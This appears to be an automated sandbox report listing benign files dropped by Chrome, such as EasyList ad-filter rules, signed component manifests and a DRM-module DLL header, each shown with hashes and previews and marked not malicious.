                                                                                                                                                                                                                                                            Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.just-news.pro^..........0.8.@.R.yomeno.xyz^..........0.8.@.R.yellowblue.io^..........0.8.@.R.abh.jp^..........0.8.@.R.ad999.biz^..........0.8.@.R._468_60...........0.8.@.R.adrecover.com^..........0.8.@.R.pemsrv.com^..........0.8.@.R.mnaspm.com^.$........0.8.@.R.tags.refinery89.com^.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_.>........*...worldstar.com0.8.@.R.js.assemblyexchange.com/wana..(........0.8.@.R.ogads-pa.googleapis.com^..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^.(........0.8.@.R.shikoku-np.co.jp/img/ad/..........0.8.@.R./banner.cgi?..........0.8.@.R./in/track?data=.!......0.8.@.R.linkbucks.com/tmpl/..........0.8.@.R.clicktripz.com^..........0.8.@.R.-ad-manager/........0.8.@.R.files.slack.com^.$........0.8.@.R.admitad-connect.com^..........0.8.@.R./300-250-.2........0.8.@.R"cloudfront.net/js/common
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):24623
                                                                                                                                                                                                                                                            Entropy (8bit):4.588307081140814
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                                                                                                                                                                            MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                                                                                                                                                                            SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                                                                                                                                                                            SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                                                                                                                                                                            SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1529
                                                                                                                                                                                                                                                            Entropy (8bit):5.982051252370357
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:pZRj/flTHYPybkYbKLgTxjeT3JzkaoXlbEQY8icDGOaoXbnT3E/XbWk+U6kjO8n:p/h4PybKzThkaklI8VD4kbnTSXbWk+U9
                                                                                                                                                                                                                                                            MD5:329A2437D4B1EC17C8E6DCD217559B89
                                                                                                                                                                                                                                                            SHA1:716B26423B811D32AFA4726DD7D9A1640108CFF5
                                                                                                                                                                                                                                                            SHA-256:9CF8010C8CFA447F0F9380FB38D114F0A86640127EA24082C597A61C4E99F2D0
                                                                                                                                                                                                                                                            SHA-512:BE6C23EADC6F4D1DFAFB7170FC63C1682673DD5C80FA8AC1671F7C4F267EAD52C39B5B7B4A406811FE60D98FE7C244A10EBC5E834026A8D1C3FEDD4A57F8814D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJfaG1nMmc3R0ZSa2ZEVVFvQWRoQjkwRVM1NTkxODhKUlBCWHpHT0VkX1J3In0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IllBQ3ZvYkFpQXUxSUljSkx2ZGlNNmxPY0xMVFE3M0F6dlYwLWEwM2U1REEifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuNTQuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"k8_0_49JMWcS1Qkgr00kJA2EtwGYwZUlWjpXCKGeZYRWFXFSbaU6OhtXlrTAbdt5z6VxDX6EbEIrebxVNW9OhlfIwrnewGdmf0VfnrWbAk3W34JdlDFj7qsVMw0W4n-AnXQgbMNnPDenRtQ7CaZ1ykFy-AskQ6UiPOohoXmMSqtcvoopecSrYgN_uEHIqDHpHQRZ5k-O3UMnA4WqeQNzYnI0UQwc4O-3EstHxQ_3Qe7CtkFv5
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.7646746586784845
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SRlkYcchAWGUSIZ/DpDDUln1n:SgxcWWGU3BDpDIp1n
                                                                                                                                                                                                                                                            MD5:15EE3110CFFD7766F9ACBF66787F7640
                                                                                                                                                                                                                                                            SHA1:5F9FF88E60668696D735A4BB763EF778A3D0A954
                                                                                                                                                                                                                                                            SHA-256:88F8B99B98B0586E9ACFCB563D7D1B65CBA3E851AAF76D83FA095EC991884608
                                                                                                                                                                                                                                                            SHA-512:C71967C0015F60E7C0FBA96E5914C2C4981D91851F8492C6CFDEE67778DB81846242CFE55EB1246B50635BA2C363BFED4BB78139A624E85479AEF2F68D5C1226
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.4927ba841546599b3eaa6e1643a5fd15babbb30be00f0f419a7f148a40a71a12
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                                                                            Entropy (8bit):4.56489413033116
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1htA:F6VlMZWuMt5SKPS1s
                                                                                                                                                                                                                                                            MD5:01C878F43569459B9671819276FC381A
                                                                                                                                                                                                                                                            SHA1:C04140758F7FD681CC55ACF2B02D988F13AEF25C
                                                                                                                                                                                                                                                            SHA-256:6000AFA1B02202ED4821C24BBDD88CEA539C2CB4D0EF7033BD5D3E6B4DDEE430
                                                                                                                                                                                                                                                            SHA-512:F80B39516CEDD3108676E4C41C19FB7A6D05F2A92FFCBB4EA595F111DFD5E4D14DC7DE5C3C871E0FE5D90D40C6C45A8C646C324329AD7AA8FD37C1D4D0810E8F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.54.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1796
                                                                                                                                                                                                                                                            Entropy (8bit):6.013516832672966
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/h0I1PmpFNMRk7ak3n+eEvLyqlcQxH5KkUqnQ0NGW6:RHPm+e7a0+eEvLBlnZK9AQ0NG9
                                                                                                                                                                                                                                                            MD5:EB44AFFA442E881680A5E001492BF854
                                                                                                                                                                                                                                                            SHA1:25E7695F09F294946288758A201B7ED3128B9F09
                                                                                                                                                                                                                                                            SHA-256:A84A32BFEDE1FCD03425C7108D31F71E384B744D6AAD5A34ED7E0992176990BB
                                                                                                                                                                                                                                                            SHA-512:DA196A7EC93C9302FFD62014BEE3BA0559515A5042EC47F812DF1114914D7556EF821487455F6386E13D8B948F3EDB92B209ACF72B3F8FA1FB6E12C0E9B19C96
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"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","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"J54-pntmLwSGnKO4zrk8jlgJ51AMnh3gUrYlFdI0EbqeWgUvN4-PdPUy4YlSo7ZJdllOLJ9JSfu9Ekf2DZfhNZOsqOBZQR2YY3t4kpNcF6eBkMn9IMqcmapVyJc1q3EIrOw4ECjRSjS0g7BB0CWWclh7FAZq2aLeHeuQemj7Yfb33OXhawuIsiz68n8y0bY_s2Eh9FzOeKDOyJdHAU43GJYjYzK3F8_Nt6UiysX7JsrHZYxiURSh9pXAgkhE5AJAvnI1frL49Rq3Qi-9tu9vVKw4czp9rmjZxNYBwHztmv3qDt_LRqzkCjcmpoD
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):7978194
                                                                                                                                                                                                                                                            Entropy (8bit):6.56942491674059
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:36VVf/lKb7TP20QiGOmYpaGD+VYviZzm/MQaEteqnvtK:Mf/t1H4tQoetQVdvtK
                                                                                                                                                                                                                                                            MD5:32F641A7EF737CF23936A032D1D7E371
                                                                                                                                                                                                                                                            SHA1:F483672A90DA0598345D892482C805AB773D620C
                                                                                                                                                                                                                                                            SHA-256:151E1CD4E7CD605D9F96FA2E60A6D9CE31C3A42E28E308AB1EC4434A7A6824CA
                                                                                                                                                                                                                                                            SHA-512:D7C9FD7183DD19D5A56B3625ED07500578AD939867F33C9D3596D494C02BCE9F9C4DF340595FB2327CD7E5BCF0E78B0438F91D5E4D1319107C6012FA45E1F348
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:......w.....a.....t.. ..h.g/..f.S@..y..H..gm.I..cm.Q..r7'g..n..o..l..v..e_....bC...d.....u.....mS....o1...p.6...s.....i9....z.....v.....k.....ja{...xa,...17....5.....4G....q.....2.7...9.....7.%...3.i...6}....8o......J...0.R...*671\.....\....[]........`...&.a....]b.....b.....e....... ef.....f.....h....... ;i.....i...$.k.../;t.........`.....u....rsula corber......}u.... to usdt..... meaning...+.lafur darri .lafsson movies and tv shows4...-.u....!v.....av.............. .... ........v.....v...(.v..... meaning.....1w.....w..... meaningz:....r eldon."..).x..... meaning....@Ex...#}x....sad.ra bjarkard.ttir barney....... .x...... ..... ..6`........ . ......].... meaning.S......R...... ............ meaning.....eviri.X. . .... ..........4..... meaning...... meaning.....5y..... meaning.p.... meaning.?.... .. .. ..<<.... meaning<<....... 2024P0
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.8559751366930737
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SdYWX2RSDWU9zTQgVRE8cUDjuAHc:SGbRwT9dgUDjU
                                                                                                                                                                                                                                                            MD5:85E3F88F5559E5EC173AD09F5039B77E
                                                                                                                                                                                                                                                            SHA1:53741A0E44F2A6FC75265EAC8D135047715771CD
                                                                                                                                                                                                                                                            SHA-256:3EDBC320D6E82C9C4187B5A2C187C72B31A1C6724357E7ADA3E9A6B5FDD2D4F6
                                                                                                                                                                                                                                                            SHA-512:C4E49C7BA3B4D982DF741FD7FEC1E6E9475A74DD103261647A26FB999F8B9901D1C6C2509F53D1F3599380AFFB4776A0D320AAED64CD65ED87693685B58DEBFD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.81d390647809b47f3150cd7e7d320669ccc048c6b01b0c1e1506c51740aabeb9
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):108
                                                                                                                                                                                                                                                            Entropy (8bit):4.830002581336876
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifF0AAGAR3CKG/w/VpKS12XkBrx:F6VlMT2C7Y/VUS12q
                                                                                                                                                                                                                                                            MD5:A60AEB7351A04597B542BA569CFDD0FD
                                                                                                                                                                                                                                                            SHA1:B5D931942C30E5F11F80AE850ABD25B4A63340D6
                                                                                                                                                                                                                                                            SHA-256:A6E1F870D2B08CA7A859667F9A1BDEA92C63EDB709ED493C90BB3B329E38A48D
                                                                                                                                                                                                                                                            SHA-512:C1EE9433D347918F4ECA9BFD98CA69456F7524F55D01A39A0BC887F84C61C3F408F99BA76999860BD26DE8DDE5443E8820F02C789D682923D2005A1CC00DE3A8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "OnDeviceHeadSuggestENUS500000",. "version": "20250114.720352271.14".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1558
                                                                                                                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                                                            Entropy (8bit):6.018989605004616
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                                                                                                                                                                                            MD5:C4709C1D483C9233A3A66A7E157624EA
SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"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","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):66
Entropy (8bit):3.820000180714897
Encrypted:false
SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
MD5:BBEC7670A2519FEB0627F17D0C0B5276
SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
Malicious:false
Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):85
Entropy (8bit):4.462192586591686
Encrypted:false
SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
MD5:084E339C0C9FE898102815EAC9A7CDEA
SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
Malicious:false
Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):9817
Entropy (8bit):4.629347296880043
Encrypted:false
SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
MD5:8C702C686B703020BC0290BAFC90D7A0
SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
Malicious:false
Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):2877728
Entropy (8bit):6.868480682648069
Encrypted:false
SSDEEP:49152:GB6BoH5sOI2CHusbKOdskuoHHVjcY94RNETO2WYA4oPToqnQ3dK5zuqvGKGxofFo:M67hlnVjcYGRNETO2WYA4oLoqnJuZI5
MD5:477C17B6448695110B4D227664AA3C48
SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: , Detection: malicious
• Filename: helpdesk@brother.com.hTM, Detection: malicious
• Filename: SARS NOTICE.html, Detection: malicious
• Filename: #U041erder.Request.html, Detection: malicious
• Filename: ATT475283.docx, Detection: malicious
• Filename: Statement 01-28-25.xlsx, Detection: malicious
• Filename: Pay_Increase5390_26946.docx, Detection: malicious
• Filename: AuditTdcj.html, Detection: malicious
• Filename: , Detection: malicious
• Filename: querida.docx, Detection: malicious
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....fd.........." ......(..........A&.......................................,.......,...`A.........................................V*......V*......`,......`+..p....+. )...p,......D*.8....................C*.(.....(.8...........p\*..............................text.....(.......(................. ..`.rdata..h.....(.......(.............@..@.data....l....*..&....*.............@....pdata...p...`+..r....*.............@..@.00cfg..(.....+......p+.............@..@.gxfg....$....+..&...r+.............@..@.retplnel.... ,.......+..................tls.........0,.......+.............@....voltbl.D....@,.......+................._RDATA.......P,.......+.............@..@.rsrc........`,.......+.............@..@.reloc.......p,.......+.............@..B........................................................................................................................................

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):1778
Entropy (8bit):6.02086725086136
Encrypted:false
SSDEEP:48:p/hCdQAdJjRkakCi0LXjX9mqjW6JmfQkNWQzXXf2gTs:RtQ1aaxXrjW6JuQEWQKas
MD5:3E839BA4DA1FFCE29A543C5756A19BDF
SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJHb29nbGUuV2lkZXZpbmUuQ0RNLmRsbCIsInJvb3RfaGFzaCI6Im9ZZjVLQ2Z1ai1MYmdLYkQyWFdBS1E5Nkp1bTR1Q2dCZTRVeEpGSExSNWMifSx7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiYk01YTJOU1d2RkY1LW9Tdml2eFdqdXVwZ05pblVGakdPQXRrLTBJcGpDZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6Im5laWZhb2luZGdnZmNqaWNmZmtncG1ubHBwZWZmYWJkIiwiaXRlbV92ZXJzaW9uIjoiMS4wLjI3MzguMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"KTPeHzS0ybFaz3_br3ASYWHjb6Ctul92067u2JMwtNYYm-4KxLiSkJZNBIzhm6hNSEW2p5kUEvHD0TjhhFGCZnWm9titj2bqJayCOAGxZb5BO74JJCRfy5Kwr1KSS4nvocsZepnHBmCiG2OV3by-Lyf1h1uU3X3bDfD92O0vJzrA8rwL2LrwIk-BolLo5nlM0I_MZwg8DhZ8SFBu9GGRVB2XrailDrv4SgupFE9gqA1HY6kjRjoyoAHbRRxZdBNNt9IKNdxNyaF9NcNRY8dAedNQ9Tw3YNp5jB7R9lcjO4knn58RdH2h_GiJ4l96StcXA4e7cqbJ77P-c

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):66
Entropy (8bit):3.974403644129192
Encrypted:false
SSDEEP:3:SLVV8T+WSq2ykFDJp9qBn:SLVqZS5p0B
MD5:D30A5BBC00F7334EEDE0795D147B2E80
SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
Malicious:false
Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):145
Entropy (8bit):4.595307058143632
Encrypted:false
SSDEEP:3:rR6TAulhFphifFooG+HhFFKS18CWjhXLXGPQ3TRpvF/FHddTcplFHddTcVYA:F6VlM5PpKS18hRIA
MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
Malicious:false
Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1766
                                                                                                                                                                                                                                                            Entropy (8bit):6.025463412751483
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:p/h52OXVAAQ5JkpkakMtlsWbW1SG++4irRk8+eVqVX:RvvVd+aDyOWs98RYBX
                                                                                                                                                                                                                                                            MD5:A20F1B28DCE4B243340B6C3FCF7583FC
                                                                                                                                                                                                                                                            SHA1:050F061EC1E6C68A8861E325CC79E74760064489
                                                                                                                                                                                                                                                            SHA-256:D7E03FDAAA665F4CEDEEC2A9601A1DEBCD449FB4AA3802C0E997DD314D3B3ADB
                                                                                                                                                                                                                                                            SHA-512:DB2A23E2CE3995F84C207EE051A91A4CD08E2674E8574653E37371FB10B12738E058573AC9E579495AA0FFF7417B0C6787DB54BE78B449080EF2F9F9CAADB3FF
                                                                                                                                                                                                                                                            Malicious:false
